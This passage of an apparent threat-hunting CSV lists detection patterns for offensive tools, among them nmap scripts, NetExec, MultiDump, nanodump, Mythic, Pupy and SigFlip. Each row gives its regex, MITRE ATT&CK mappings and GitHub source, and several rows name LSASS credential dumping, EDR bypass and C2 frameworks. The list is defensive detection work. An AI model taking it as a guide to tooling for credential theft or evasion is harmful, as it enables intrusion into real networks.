"*/msrpc-enum.nse*",".{0,1000}\/msrpc\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mssql_priv.py*",".{0,1000}\/mssql_priv\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/ms-sql-brute.nse*",".{0,1000}\/ms\-sql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-config.nse*",".{0,1000}\/ms\-sql\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-dac.nse*",".{0,1000}\/ms\-sql\-dac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-dump-hashes.nse*",".{0,1000}\/ms\-sql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-empty-password.nse*",".{0,1000}\/ms\-sql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mssqlexec.py*",".{0,1000}\/mssqlexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/ms-sql-hasdbaccess.nse*",".{0,1000}\/ms\-sql\-hasdbaccess\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-info.nse*",".{0,1000}\/ms\-sql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-ntlm-info.nse*",".{0,1000}\/ms\-sql\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mssqlproxy.git*",".{0,1000}\/mssqlproxy\.git.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","8","704","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*/ms-sql-query.nse*",".{0,1000}\/ms\-sql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-tables.nse*",".{0,1000}\/ms\-sql\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-xp-cmdshell.nse*",".{0,1000}\/ms\-sql\-xp\-cmdshell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mtrace.nse*",".{0,1000}\/mtrace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mtth-bfft/adeleg/releases*",".{0,1000}\/mtth\-bfft\/adeleg\/releases.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*/MultiDump.exe*",".{0,1000}\/MultiDump\.exe.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","1","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*/MultiDump.git*",".{0,1000}\/MultiDump\.git.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","1","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*/MultiPotato.git*",".{0,1000}\/MultiPotato\.git.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*/multi-user.target.wants/tor.service*",".{0,1000}\/multi\-user\.target\.wants\/tor\.service.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/murmur-version.nse*",".{0,1000}\/murmur\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mushishi.h*",".{0,1000}\/mushishi\.h.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/MutationGate.git*",".{0,1000}\/MutationGate\.git.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","1","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*/mysql-audit.nse*",".{0,1000}\/mysql\-audit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-brute.nse*",".{0,1000}\/mysql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-databases.nse*",".{0,1000}\/mysql\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-dump-hashes.nse*",".{0,1000}\/mysql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-empty-password.nse*",".{0,1000}\/mysql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-enum.nse*",".{0,1000}\/mysql\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-info.nse*",".{0,1000}\/mysql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-query.nse*",".{0,1000}\/mysql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-users.nse*",".{0,1000}\/mysql\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-variables.nse*",".{0,1000}\/mysql\-variables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-vuln-cve2012-2122.nse*",".{0,1000}\/mysql\-vuln\-cve2012\-2122\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Mystikal.git*",".{0,1000}\/Mystikal\.git.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*/mystikal.py*",".{0,1000}\/mystikal\.py.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*/Mythic/mythic*",".{0,1000}\/Mythic\/mythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/Mythic_CLI*",".{0,1000}\/Mythic_CLI.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/MythicAgents/*",".{0,1000}\/MythicAgents\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/MythicAgents/*",".{0,1000}\/MythicAgents\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/MythicC2Profiles/*",".{0,1000}\/MythicC2Profiles\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/mythic-cli*",".{0,1000}\/mythic\-cli.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/MythicConfig.cs*",".{0,1000}\/MythicConfig\.cs.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/mythic-react-docker*",".{0,1000}\/mythic\-react\-docker.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/mzet-/les-res*",".{0,1000}\/mzet\-\/les\-res.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/n1nj4sec/pupy*",".{0,1000}\/n1nj4sec\/pupy.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/nanodump*",".{0,1000}\/nanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*/nanodump.*",".{0,1000}\/nanodump\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/nanodump.py*",".{0,1000}\/nanodump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/nanorobeus.git*",".{0,1000}\/nanorobeus\.git.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*/nanorubeus/*",".{0,1000}\/nanorubeus\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Native/SigFlip/*",".{0,1000}\/Native\/SigFlip\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/NativeDump.exe*",".{0,1000}\/NativeDump\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*/NativeDump.git*",".{0,1000}\/NativeDump\.git.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*/nat-pmp-info.nse*",".{0,1000}\/nat\-pmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nat-pmp-mapport.nse*",".{0,1000}\/nat\-pmp\-mapport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nbd-info.nse*",".{0,1000}\/nbd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nbns-interfaces.nse*",".{0,1000}\/nbns\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - 